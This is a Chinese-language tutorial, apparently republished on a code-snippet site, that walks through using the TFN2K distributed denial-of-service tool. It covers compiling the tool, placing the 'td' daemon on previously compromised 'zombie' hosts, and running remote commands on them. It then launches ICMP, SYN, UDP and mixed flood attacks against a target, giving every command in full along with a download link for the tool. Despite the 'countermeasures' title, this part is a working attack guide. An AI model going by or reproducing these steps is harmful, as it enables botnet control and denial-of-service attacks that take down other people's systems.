攒够失望就离开吧,总不能再攒够绝望。只有永远躺在泥坑里的人,才不会再掉进坑里。想编织未来的美梦,现在正是时候,掌握现在,拥有一切,拥有生命。我们明知生活不公平,但还是告诉自己不能放弃。大家早安!
tfn2k使用方法和对策(2) 作者:佳佳 佳佳继续上一次的文章,这一次是攻击测试。 测试环境: 共有5台机器,佳佳是在五台redhat linux6.2上测试的。 192.168.111.1 192.168.111.2 192.168.111.3 192.168.111.55 192.168.111.88 测试目的:?????(感受一下yahoo怎么被攻击的) 简要介绍: 我们的测试目的是用192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3 三台机器对192.168.111.88发动攻击。(实际攻击中就不止三台了。) 因此我们的步骤如下: 0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。也就是我们俗称的“肉鸡”。 1。编译代码。 2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。 3。在192.168.111.55安装tfn。 4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3 对192.168.111.88发动攻击。 5。攻击结束。 详细步骤: 0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。 这一步我就不说了,大家一定有办法。。。 1。编译代码。 假设在192.168.112.55上。。。 首先一定要有root权限 $su # 解开文件: #tar zxvf tfn2k.tgz #cd tfn2k 如果你不是linux或者bsd请修改src下的Makefile文件。(有一网友问佳佳,solaris为什么不行。如果你修改了Makefile,把linux改成了solaris仍然不行,佳佳也不知道了,因为佳佳没有solaris的测试环境。) #make make过程中会让你输入一个密码,8--32位的。那就输入一个吧,将来tfn和td联系时需要这个密码。我输入的是:aaaabbbb make完成你会发现,多了两个可执行文件:tfn,td 2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。 #ftp 192.168.111.1 ftp>bin fpt>put td ftp>by ftp的具体步骤我就不说了,大家一定都知道。 同样方法:ftp 192.168.111.2 ftp 192.168.111.3 然后在分别在192.168.111.1,192.168.111.2,192.168.111.3上 #./td 注意一定要有root权限,否则无法运行。 3。在192.168.111.55安装tfn。 由于我们是在192.168.111.55上编译的,tfn就已经在了。 4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3对192.168.111.88发动攻击。 好了,我们终于完成了准备工作,攻击可以开始了。。。 我现在在192.168.111.55的/tfn2k/目录下。。。 我们需要编辑一个文件列表。 #vi hosts.txt 文件第一行输入:192.168.111.1 文件第二行输入:192.168.111.2 文件第三行输入:192.168.111.3 这就是控制文件列表。 然后我们测试一下连接。 在192.168.111.55上。。。 下面的命令意思是:在hosts.txt文件中的机器上执行远程命令“mkdir jjgirl”,其中-c 10表示执行远程命令。执行完这个命令就会在那三台机器上都建立jjgirl目录。当然你可以随便执行其他的命令。 #./tfn -f hosts.txt -c 10 -i "mkdir jjgirl" Protocol : random Source IP : random Client input : list Command : execute remote command Password verification: (这时我们输入密码:aaaabbbb) Sending out packets: . 好了,完成。 然后我们在192.168.111.1上执行: #find / -name jjgirl -print 好,找到了。说明我们连接成功。。。 下面开始正式攻击了。。。 你可以在192.168.111.1上: #./ntop 运行ntop查看流量。 先来ICMP攻击 #./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分钟,192.168.111.88就死机了) 重启,接着测试。。。 SYN/TCP攻击: #./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80 UDP攻击: #./tfn -f hosts.txt -c 4 -i 192.168.111.88 ICMP/TCP/UDP轮流攻击: #./tfn -f hosts.txt -c 8 -i 192.168.111.88 5。攻击结束 如果我们想停止攻击: #./tfn -f host.txt -c 0 实际tfn还有许多攻击选项,大家可以再回头看我的第一篇文章,看一下-c后面的11个选项。 整个测试结束。由于我是在局域网测试速度比较快。实际对yahoo等攻击时至少有几十台机器吧。 好了,下一篇文章主要分析tfn的源代码,有兴趣的同学接着等。。。 jjgirl 10.29.2000 jjgirl@363.net http://jjgirl.yeah.net 下载地址: http://darknet.evilnerds.org/dos/ddos/tfn2k.tgz
以上就是tfn2k如何使用方法和对策(2)。只有坚强的人才承认自己的错误。只有坚强的人才谦虚,只有坚强的人才宽恕,——而且的确只有坚强的人才大笑,不过他的笑声常常近似眼泪。更多关于tfn2k如何使用方法和对策(2)请关注haodaima.com其它相关文章!